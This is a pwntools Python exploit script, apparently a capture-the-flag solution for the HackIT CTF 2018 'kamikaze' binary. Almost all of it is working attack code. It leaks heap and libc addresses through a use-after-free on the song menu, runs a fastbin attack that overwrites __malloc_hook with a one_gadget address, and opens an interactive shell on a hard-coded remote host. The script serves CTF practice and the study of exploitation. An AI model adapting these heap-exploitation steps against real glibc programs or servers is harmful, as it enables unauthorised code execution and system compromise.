HackIT CTF 2018 KAMIKAZE
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# libc = ELF('')
# Challenge binary, loaded from the current directory; its arch feeds context() below.
elf = ELF('./kamikaze')
context(os='linux', arch=elf.arch)
# context(log_level='debug') # output verbose log
# Connection endpoints chosen by the first CLI argument in the option
# handling further down: 'r' -> RHOST:RPORT, 'l' -> LHOST:LPORT.
RHOST = "185.168.131.14"
RPORT = 6200
LHOST = "127.0.0.1"
LPORT = 6200
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of section *name*.

    *elf* defaults to the module-level target binary; any pwntools ELF
    object with ``get_section_by_name`` works. Unused by the script body.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the variable named by *ss* as hex, e.g. ``dbg('heap_base')``.

    *ss* is passed to ``eval`` and resolved against this module's globals, so it
    must only ever be a literal identifier written in this script (here
    'heap_base' and 'libc_base') -- never anything read back from the target.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
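conn = None
# First CLI argument selects the target: 'r' remote, 'l' local listener,
# 'd' run under gdb, 'a' spawn then attach gdb, anything else a plain process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in ('r', 'l'):
    # Tuple membership instead of the substring test `opt in 'rl'`: that form
    # also accepted '' and 'rl', which then raised KeyError on the dict lookup.
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # The template contains no '{}' placeholder, so .format() is a no-op here;
    # the script only runs `continue`.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./kamikaze'], gdbscript=gdbscript)
else:
    conn = process(['./kamikaze'])
    # conn = process(['./kamikaze'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)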
def create(w, s, stanza, hook):
    """Menu option 1: add a song.

    *w* answers the weight prompt NUL-padded to 0xd bytes, *s* answers the
    '... of the stanza:' prompt NUL-padded to 4 bytes; *stanza* and *hook*
    are sent verbatim, so the caller controls their exact length.
    """
    conn.sendlineafter('>> ', '1')
    fields = (
        ('he song:', str(w).ljust(0xd, '\x00')),
        ('of the stanza:', str(s).ljust(0x4, '\x00')),
        ('Enter the stanza:', stanza),
        ('Leave a short hook for it too: ', hook),
    )
    for prompt, data in fields:
        conn.sendafter(prompt, data)
def edit(weight, stanza):
    """Menu option 2: select the song with *weight* and replace its stanza with *stanza*."""
    conn.sendlineafter('>> ', '2')
    weight_field = str(weight).ljust(0x14, '\x00')  # NUL-padded to 0x14 bytes
    conn.sendafter('weight:', weight_field)
    conn.sendafter('stanza:', stanza)
def kamikaze(weight, seed):
    """Menu option 3: send *weight* then *seed*, each NUL-padded to 4 bytes."""
    conn.sendlineafter('>> ', '3')
    for prompt, value in (('weight:', weight), ('Enter seed:', seed)):
        conn.sendafter(prompt, str(value).ljust(4, '\x00'))
def delete(weight):
    """Menu option 4: remove the song identified by *weight* (NUL-padded to 0x14 bytes)."""
    conn.sendlineafter('>> ', '4')
    padded = str(weight).ljust(0x14, '\x00')
    conn.sendafter('weight:', padded)
def play(idx):
    """Menu option 5: request the song at index *idx*; the caller reads the reply."""
    conn.sendlineafter('>> ', '5')
    conn.sendlineafter('Enter song index:', str(idx))
# exploit
# --- Interaction sequence ------------------------------------------------
# Written against the Python 2 pwntools API: p64() results are concatenated
# with str literals below, which raises TypeError under Python 3.
# Each menu call changes the target's state, so these statements are
# order-dependent; keep them in this sequence. Every heap and libc offset
# below is a hard-coded constant for the author's target build
# (NOTE(review): `libc = ELF('')` at the top is left unset -- confirm the
# offsets against the challenge's own files before relying on them).
log.info('Pwning')
create(0xf, 0x28, '0'*0x1f+'\n', '0'*0x10)
# leak heap address
create(10, 0x28, 'x'*0x1f+'\n', '1'*0x10)
create(20, 0x28, 'x'*0x1f+'\n', '2'*0x10)
delete(10)
create(30, 0x68, 'x'*0x1f+'\n', '3'*0x10)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(20)
kamikaze(40, 0x2)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(30)
play(6)
# The 'Weight: ' field printed by option 5 is parsed as a hex number;
# 0xf0 is its hard-coded expected distance from the start of the heap.
conn.recvuntil('Weight: ')
heap_base = int(conn.recvline()[:-1], 16) - 0xf0
dbg('heap_base')
# leak libc address
delete(40)
payload = p64(0x100) + p64(heap_base+0xc8) + p64(0) + 'x'*0xe +'\n'
create(100, 0x28, payload, 'z'*0x10)
edit(0x100, '\xd1')
delete(40)
create(60, 0x68, 'x'*0x1f+'\n', '2'*0x10)
create(60, 0x68, 'x'*0x1f+'\n', '2'*0x10)
play(3)
conn.recvuntil('Weight: ')
# Same parsing as the heap leak; 0x3c4b78 is a libc-build-specific offset
# (NOTE(review): verify for the libc actually shipped with the challenge).
libc_base = int(conn.recvline()[:-1], 16) - 0x3c4b78
dbg('libc_base')
create(60, 0x68, p64(libc_base+0x3c4b78)*2+'\n', '2'*0x10)
delete(60)
edit(0, '\x00'*6)
create(60, 0x68, p64(libc_base+0x3c4b78)*2+'\n', '2'*0x10)
delete(0xf)
create(0xe, 0x28, '0'*0x1f+'\n', '0'*0x10)
create(0xf, 0x28, '0'*0x1f+'\n', '0'*0x10)
create(10, 0x28, 'x'*0x1f+'\n', '1'*0x10)
create(20, 0x28, 'x'*0x1f+'\n', '2'*0x10)
delete(10)
create(30, 0x68, 'x'*0x1f+'\n', '3'*0x10)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(20)
kamikaze(40, 0x2)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(30)
delete(40)
payload = p64(0x100) + p64(heap_base+0x3b0) + p64(0) + 'x'*0xe +'\n'
create(100, 0x28, payload, 'z'*0x10)
# fastbin attack & write to __malloc_hook
# libc_base+0x3c4aed and libc_base+0xf02a4 are likewise build-specific
# constants; the first is cut to 6 bytes by the [:6] slice before sending.
edit(0x100, p64(libc_base+0x3c4aed)[:6])
create(100, 0x68, payload, 'z'*0x10)
payload = '\x00'* 3 + p64(0)*2 + p64(libc_base+0xf02a4)+'\n'
create(100, 0x68, payload, 'z'*0x10)
# Relay stdin/stdout to the connection from here on.
conn.interactive()